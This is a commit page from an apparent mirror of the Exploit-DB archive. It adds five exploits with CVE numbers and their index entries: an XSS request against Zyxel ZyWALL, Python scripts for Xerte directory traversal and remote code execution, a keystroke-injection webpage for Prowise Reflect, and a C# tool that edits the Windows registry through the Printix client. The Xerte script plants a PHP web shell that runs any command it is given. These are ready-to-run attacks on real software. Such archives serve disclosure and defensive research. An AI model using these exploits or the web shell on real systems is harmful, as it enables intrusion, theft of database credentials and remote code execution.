bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-03-03

Browse source 
5 changes to exploits/shellcodes

Prowise Reflect v1.0.9 - Remote Keystroke Injection
Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
Xerte 3.10.3 - Directory Traversal (Authenticated)
Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2022-03-03 05:01:37 +00:00
parent bba496461e
commit 00bdb64074
6 changed files with 764 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
exploits/multiple/webapps/50797.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

58
exploits/php/webapps/50794.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665
# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>
import requests
import re
xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to create a user-folder
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the created user-direcotry:
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
# Grab file
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
print(result.text)
print("|-- Used Variables: --|")
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
print("user direcotry: " + user_direcotry)
print("Curl example:")
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)

185
exploits/php/webapps/50795.py Executable file
View file

@ -0,0 +1,185 @@
# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664
# This PoC assumes guest login is enabled and the en-GB langues files are used.
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota
import requests
import re
xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to find the install path
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the install path:
install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
}
# index.inc file
data = \
'''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
*
* index.php english language file
*
* @author Patrick Lockley
* @version 1.0
* @copyright Pat Lockley
* @package
*/
define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"
''' \
+ install_path \
+ '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''
# Overwrite index.inc file
response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
print('Installation path: ' + install_path)
print(response.text)
if "success" in response.text:
print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')

86
exploits/windows/remote/50796.html Normal file
View file

@ -0,0 +1,86 @@
# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10
# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.
# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
# - Start menu will open, types notepad.exe and types hello world.
<!DOCTYPE HTML>
<html>
<head>
<script type = "text/javascript">
function wait(ms){
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
}
function WebSocketTest() {
var StateConnecting = new Boolean(false);
if ("WebSocket" in window) {
// Let us open a web socket
var ws = new WebSocket("ws://localhost:8082");
ws.onopen = function() {
ws.send('{"event":"keyboard", "key":"super"}');
wait(400);
//character is slower
// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
var exploitcode = "notepad.exe"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(300);
ws.send('{"event":"keyboard", "key":"enter"}');
wait(2000);
exploitcode = "Hello world!"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(200);
};
ws.onmessage = function (evt) {
var received_msg = evt.data;
};
ws.onclose = function() {
// websocket is closed.
alert("Connection is closed...");
};
} else {
// The browser doesn't support WebSocket
alert("WebSocket NOT supported by your Browser!");
}
}
</script>
</head>
<body>
<div id = "sse">
<a href = "javascript:WebSocketTest()">Exploit!</a>
</div>
</body>
</html>

413
exploits/windows/remote/50798.cs Normal file
View file

@ -0,0 +1,413 @@
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089
using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
/**
* ________________________________________
*
* Printix Vulnerability, CVE-2022-25089
* Part of a Printix Vulnerability series
* Author: Logan Latvala
* Github: https://github.com/ComparedArray/printix-CVE-2022-25089
* ________________________________________
*
*/
namespace ConsoleApp1a
{
public class PersistentRegistryData
{
public PersistentRegistryCmds cmd;
public string path;
public int VDIType;
public byte[] registryData;
}
[JsonConverter(typeof(StringEnumConverter))]
public enum PersistentRegistryCmds
{
StoreData = 1,
DeleteSubTree,
RestoreData
}
public class Session
{
public int commandNumber { get; set; }
public string host { get; set; }
public string data { get; set; }
public string sessionName { get; set; }
public Session(int commandSessionNumber = 0)
{
commandNumber = commandSessionNumber;
switch (commandSessionNumber)
{
//Incase it's initiated, kill it immediately.
case (0):
Environment.Exit(0x001);
break;
//Incase the Ping request is sent though, get its needed data.
case (2):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
data = "pingData";
sessionName = "PingerRinger";
break;
//Incase the RegEdit request is sent though, get its needed data.
case (49):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
//persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
Console.Write("Registry Node: ");
persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
Console.WriteLine("Full Address Set To: " + persistentRegistryData.path);
//persistentRegistryData.registryData = new byte[2];
//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n");
Console.Write("Type: ");
int dataF = int.Parse(Console.ReadLine());
Console.WriteLine("Set Data to: " + dataF);
Console.WriteLine("\n What value is your type? \n");
Console.Write("Value: ");
string dataB = Console.ReadLine();
Console.WriteLine("Set Data to: " + dataF);
byte[] loader = null;
List<byte> byteContainer = new List<byte>();
//Dword = 4
//SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
switch (dataF)
{
case (1):
loader = selectDataType(dataB, RegistryValueKind.String);
byteContainer.Add(1);
break;
case (2):
loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
byteContainer.Add(4);
break;
case (3):
loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
byteContainer.Add(11);
break;
case (4):
loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
byteContainer.Add(7);
break;
}
int pathHolder = 0;
foreach (byte bit in loader)
{
pathHolder++;
byteContainer.Add(bit);
}
persistentRegistryData.registryData = byteContainer.ToArray();
//added stuff:
//PersistentRegistryData data = new PersistentRegistryData();
//data.cmd = PersistentRegistryCmds.RestoreData;
//data.path = "";
//data.cmd
Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
data = JsonConvert.SerializeObject(persistentRegistryData);
break;
//Custom cases, such as custom JSON Inputs and more.
case (100):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
Console.WriteLine("\n What Data Should Be Sent?\n");
Console.Write("Data: ");
data = Console.ReadLine();
Console.WriteLine("Data set to: " + data);
Console.WriteLine("\n What Session Name Should Be Used? \n");
Console.Write("Session Name: ");
sessionName = Console.ReadLine();
Console.WriteLine("Session name set to: " + sessionName);
break;
}
}
public static byte[] selectDataType(object value, RegistryValueKind format)
{
byte[] array = new byte[50];
switch (format)
{
case RegistryValueKind.String: //1
array = Encoding.UTF8.GetBytes((string)value);
break;
case RegistryValueKind.DWord://4
array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
break;
case RegistryValueKind.QWord://11
if (value == null)
{
value = 0L;
}
array = BitConverter.GetBytes((long)value);
break;
case RegistryValueKind.MultiString://7
{
if (value == null)
{
value = new string[1] { string.Empty };
}
string[] array2 = (string[])value;
foreach (string s in array2)
{
byte[] bytes = Encoding.UTF8.GetBytes(s);
byte[] second = new byte[1] { (byte)bytes.Length };
array = array.Concat(second).Concat(bytes).ToArray();
}
break;
}
}
return array;
}
}
class CVESUBMISSION
{
static void Main(string[] args)
{
FORCERESTART:
try
{
//Edit any registry without auth:
//Use command 49, use the code provided on the desktop...
//This modifies it directly, so no specific username is needed. :D
//The command parameter, a list of commands is below.
int command = 43;
//To force the user to input variables or not.
bool forceCustomInput = false;
//The data to send, this isn't flexible and should be used only for specific examples.
//Try to keep above 4 characters if you're just shoving things into the command.
string data = "{\"profileID\":1,\"result\":true}";
//The username to use.
//This is to fulfill the requriements whilst in development mode.
DefaultValues.CurrentSessName = "printixMDNs7914";
//The host to connect to. DEFAULT= "localhost"
string host = "192.168.1.29";
// Configuration Above
InvalidInputLabel:
Console.Clear();
Console.WriteLine("Please select the certificate you want to use with port 21338.");
//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
Console.WriteLine("Already selected, client authentication isn't needed.");
Console.WriteLine(" /───────────────────────────\\ ");
Console.WriteLine("\nWhat would you like to do?");
Console.WriteLine("\n 1. Send Ping Request");
Console.WriteLine(" 2. Send Registry Edit Request");
Console.WriteLine(" 3. Send Custom Request");
Console.WriteLine(" 4. Experimental Mode (Beta)\n");
Console.Write("I choose option # ");
try
{
switch (int.Parse(Console.ReadLine().ToLower()))
{
case (1):
Session session = new Session(2);
command = session.commandNumber;
host = session.host;
data = session.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (2):
Session sessionTwo = new Session(49);
command = sessionTwo.commandNumber;
host = sessionTwo.host;
data = sessionTwo.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (3):
Console.WriteLine("What command number do you want to input?");
command = int.Parse(Console.ReadLine().ToString());
Console.WriteLine("What IP would you like to use? (Default = localhost)");
host = Console.ReadLine();
Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
data = Console.ReadLine();
Console.WriteLine("What session name do you want to use? ");
DefaultValues.CurrentSessName = Console.ReadLine();
break;
case (4):
Console.WriteLine("Not yet implemented.");
break;
}
}
catch (Exception e)
{
Console.WriteLine("Invalid Input!");
goto InvalidInputLabel;
}
Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
CompCommClient client = new CompCommClient();
byte[] responseStorage = new byte[25555];
int responseCMD = 0;
client.Connect(host, 21338, 3, 10000);
client.SendMessage(command, Encoding.UTF8.GetBytes(data));
// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
// Check for output multiple times, and see if this is conclusive.
//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
new Thread(() => {
//Thread.Sleep(4000);
if (client.Connected())
{
int cam = 0;
// 4 itterations of loops, may be lifted in the future.
while (cam < 5)
{
//Reads the datastream and keeps returning results.
//Thread.Sleep(100);
try
{
try
{
if (responseStorage?.Any() == true)
{
//List<byte> byo1 = responseStorage.ToList();
if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
{
foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
{
if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
{
Console.Write(cam2);
}
}
}else
{
}
}
}
catch (Exception e) { Debug.WriteLine(e); }
client.Read(out responseCMD, out responseStorage);
}
catch (Exception e)
{
goto ReadException;
}
Thread.Sleep(100);
cam++;
//Console.WriteLine(cam);
}
}
else
{
Console.WriteLine("[WARNING]: Client is Disconnected!");
}
ReadException:
try
{
Console.WriteLine("Command Variable Response: " + responseCMD);
Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
client.disConnect();
}
catch (Exception e)
{
Console.WriteLine("After 4.2 Seconds, there has been no response!");
client.disConnect();
}
}).Start();
Console.WriteLine(responseCMD);
Console.ReadLine();
}
catch (Exception e)
{
Console.WriteLine(e);
Console.ReadLine();
//Environment.Exit(e.HResult);
}
goto FORCERESTART;
}
}
}

5
files_exploits.csv
View file

@ -18630,6 +18630,8 @@ id,file,description,date,author,type,platform,port
50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows, 50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware, 50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware, 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44863,3 +44865,6 @@ id,file,description,date,author,type,platform,port
50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php, 50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,
50788,exploits/linux/webapps/50788.txt,"Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,Ghuliev,webapps,linux, 50788,exploits/linux/webapps/50788.txt,"Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,multiple, 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple,

Can't render this file because it is too large.